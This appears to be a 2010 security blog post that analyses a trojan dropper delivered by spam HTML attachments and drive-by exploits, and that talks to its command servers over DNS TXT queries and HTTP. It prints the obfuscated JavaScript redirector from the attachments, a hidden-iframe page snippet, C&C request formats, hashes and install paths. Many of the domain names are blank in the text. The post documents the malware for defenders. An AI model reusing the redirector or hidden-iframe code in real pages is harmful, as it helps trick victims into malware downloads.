New Dropper Uses DNS To Communicate

During the last few weeks I’ve monitored a new Dropper which is using DNS and HTTP in combination to communicate with the Command&Control Server (C&C).

I’ve first seen the Trojan on 2010-06-08 being dropped by a well known Exploit Kit called NeoSploit. The AV detection rate is pretty good: most of the AV-vendors are currently detecting the binaries which are used to spread the Trojan as Fake-AV. As fare as what I have seen is that this Trojan is just a dropper which drops additional Fake-AV software.

Back in june when I first saw the Trojan I’ve added a signature to AMaDa. Hence AMaDa will tag the binaries and URLs which are associated with this Trojan as DNSTrojan.

In September 2010, I just saw a peak on AMaDa in new URLs propagating DNSTrojan:

Over the past days I’ve saw dozends domain names popping up which are being used to spread the Trojan (using Drive-By exploits). Here are some of them:

As already mentioned before, the Trojan is just being used to drop Fake-AV software. For now I’ve identified the following domain names which are associated with this Fake-AV campaign:

*** Spam Mails propagating the DNSTrojan ***

This week I’ve found dozens of Spam mails in my honey pots which have had a HTML file attached. Some of the subject I’ve seen so far are:

  • Consultation Appointment
  • Questions
  • Outstanding invoice – 9386 Ltd
  • Nivea commercial payment
  • Appraisal – Killington $155000
  • Re: GO HOME + SHE SAID /
  • Transaction Breakdown
  • Offer on Killington
  • Fwd: Addendum to extend close of escrow!
  • Signatures to Intercreditor
  • demands for payment
  • Mortgage Breakdown PITI
  • notes from last week
  • and many more…

The HTML files which are attached to all those spam mails contains JavaScript code:

<script type='text/javascript'>
var s="=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00cmbdlmfgjmn/dpn0y/iunm#!0?";
m=""; for (i=0; i<s.length; i++) {    if(s.charCodeAt(i) == 28){      m+= '&';}
 else if (s.charCodeAt(i) == 23) {      m+= '!';} else {      m+=String.fromCharCode(s.charCodeAt(i)-1);

Hum? Obfuscated JavaScript code. If we decode it the following HTML code appears:

<meta http-equiv="refresh" content="0;url=" />

The JavaScript coded embedded in the malicious attachment are redirecting the victim to a hijacked website which displays the following message in the web browser:

For now I’ve seen the following hijacked websites involved in this spam campaign:

The hijacked website tries to do two things:

  1. Install the ZeuS Banking Trojan using drive-By exploits (See AMaDa)
  2. Redirect the victim once again to site which is controlled by the cybercriminals to distribute DNSTrojan

The HTML source code of the hijacked websites (x.html) looks like this:

<meta http-equiv="refresh" content="4;url=" />
<iframe width="0" height="0" src=" [...]"></iframe>

Once the victim has been redirected to the site controlled by the cybercriminals, the page tries to assure the victim that his computer is infected with malware and offers him a malicious EXE-file:

The binary served by those websites contains the DNSTrojan and is being detected as “Fake-AV” by the most AV-vendors:

Filename: antivirus.exe
File size : 169984 bytes
MD5 : a00b75b0d43702d4b099548b90c715c7
SHA1 : 559a83509db3969f5207615d48fe70dcb1997bb8
VT: 33 /43 (76.7%)

As of 2010-09-21 19:00 UTC, the spam campaign is still going on.

*** The DNSTrojan ***
Let take a closer look at the Trojan which is being dropped: The Trojan installs itself into the following directories:

c:\program files\common files\microsoft shared\web folders\servemonsonsext.exe
c:\program files\common files\microsoft shared\Triedt\trieditriedit.exe
c.\program files\common files\microsoft shared\TextConv\quillmsconv97.exe

Note that the file names used by the Trojan varies. Additionally the Trojan has a interesting behavior when Apple Quick Time is installed on the victims computer: He will install itself into the Quick Time directory:

c:\program files\quicktime\pictureviewer.resources\nl.lproj\quicktimequicktime.exe
c:\program files\apple software updatesoftwareupdate.resource\it.lproj\AppleUpdate2.0.0.10.exe
c.\program files\apple software update\softwareupdate.resource\fr.lproj\AppleUpdate.exe

In a next step the Trojan contacts its first Command&Control Server which is located at But the interesting thing is that the Trojan uses DNS instead of HTTP to communicate with the C&C in the first stage:

Standard query TXT
Standard query response TXT

The Trojan is doing a DNS TXT query to every few minutes by using the current UNIX timestamp as subdomain (*unixtimestamp* C&C server replies with a encrypted string (seems to be always the same):

$ dig TXT +short

Afterwards the Trojan resolves the domain name and will contact a second C&C server located at This time the Trojan uses HTTP to communicate with the C&C:

GET /httpss/v=&step=2&hostid= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

The C&C server will answer with a HTTP 404 (Not found) but the response also contains encrypted data anyway. I assume the cybercriminals are doing this to fool security researchers and IDS/IPS:

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


Last but not least the Trojan query a third C&C server located at every 30 seconds:

GET /getfile.php?r=XXXX&p= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Note that the p string is a base64 encrypted string containing the values “MACHINE”, “OP” and “TRK”.

*** Conclusion ***

  • The Trojan is pretty new (first see in June 2010)
  • The detection rate on the Trojan binaries is currently pretty good
  • The Trojan uses DNS and HTTP to communicate with the C&C
  • The Trojan dropps Fake-AV software (using “getfile.php”)

I recommend you to block the access to the following domain names which are associated with DNSTrojan: ( – AS32097 WII-KC – WholeSale Internet, Inc.) ( – AS32097 WII-KC – WholeSale Internet, Inc.) ( – AS32097 WII-KC – WholeSale Internet, Inc.) -

0 Responses to “New Dropper Uses DNS To Communicate”

  • No Comments

Leave a Reply